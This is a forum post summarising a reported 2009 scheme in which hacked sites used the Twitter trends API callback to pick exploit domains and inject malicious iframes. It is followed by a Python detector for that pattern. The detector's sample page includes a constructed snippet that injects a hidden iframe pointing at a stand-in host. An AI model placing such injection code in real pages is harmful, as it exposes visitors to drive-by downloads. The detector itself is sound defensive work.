Attackers use Twitter API function to create iFrame attack



Post by luntrus »

Hi users of NS,

It appears that Twitter offers all sorts of possibilities for cybercriminals
for dubious activities, because besides the use of malicious Tweets, the
Twitter API is also an attack vector of choice.

Security researcher Denis Sinegubko discovered that the API used to generate the 30 most popular themes
is being used to hide malcode that links to exploit sites.
The script uses the second letter in the most popular Twitter search query of two days ago
to check which exploit site to redirect a victim to.
This gives the hackers ample time to register a new domain that will be active the following day.
Then the attackers place the Twitter code onto hacked websites.

Well contemplated scheme
According to Sinegubko this makes the whole script look less suspicious, so it stays under the radar.
http://blog.unmaskparasites.com/2009/11 ... s-scripts/
The script in question has been heavily obfuscated to circumvent easy detection,
even more so because the function that will create all the havoc is nowhere called explicitly.
For this the attackers use the 'callback' feature of the Twitter API.
Twitter then sends back JavaScript that calls the function given by the hacker,
which then causes a malicious iframe injection.
"This is more likely than not the most creative script seen so far.
Happily for us they did not ponder on it thoroughly", according to Sinegubko.
Of the registered domain names, only one was actually registered.

According to a reaction on Sinegubko's blog, the researcher stumbled upon the Mebroot malware, also known as
Sinowal or Torpig.
http://www.cs.ucsb.edu/~seclab/projects ... index.html
The algorithm the malicious software uses to generate the drive-by-download servers
was recently updated to use the Twitter API.
But I assume we can feel secure having NS inside our browser,
no matter what devious scripts are sent to us.

luntrus
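As an added example (not from the post or from Sinegubko's write-up), here is a small Python checker a site owner could run over a page's HTML to flag the pattern described above: a cross-origin JSONP script tag that names a callback, plus an inline definition of that callback which creates an iframe. The sample page, the Twitter trends URL and the callback name `tcb` are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample of an infected page (not real malware): a JSONP script
# tag pointing at a Twitter trends endpoint names an inline callback, and that
# callback appends a hidden iframe whose host depends on the returned trend.
SAMPLE_HTML = """<html><body><p>Legit content</p>
<script>
function tcb(d){var f=document.createElement('iframe');
f.style.visibility='hidden';
f.src='http://'+d.trends[0].name.charAt(1)+'-example.invalid/';
document.body.appendChild(f);}
</script>
<script src="http://search.twitter.com/trends/daily.json?callback=tcb"></script>
<script src="https://cdn.example.com/analytics.js"></script>
</body></html>"""

# Hosts whose JSONP responses we treat as a trends/callback source (assumed list).
TRENDS_HOSTS = {"search.twitter.com", "api.twitter.com", "twitter.com"}
IFRAME_RE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)|<iframe", re.I)

class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

def find_trends_jsonp_abuse(html):
    """Return [{'callback', 'src'}] for each trends JSONP tag whose named
    callback is defined inline in a block that also builds an iframe."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        u = urlparse(src)
        cb = parse_qs(u.query).get("callback", [None])[0]
        if u.hostname not in TRENDS_HOSTS or not cb:
            continue
        defn = re.compile(r"function\s+" + re.escape(cb) + r"\s*\(")
        if any(defn.search(b) and IFRAME_RE.search(b) for b in p.inline):
            findings.append({"callback": cb, "src": src})
    return findings
```

Run `find_trends_jsonp_abuse(SAMPLE_HTML)` to see the flagged tag; a page with only ordinary external scripts returns an empty list.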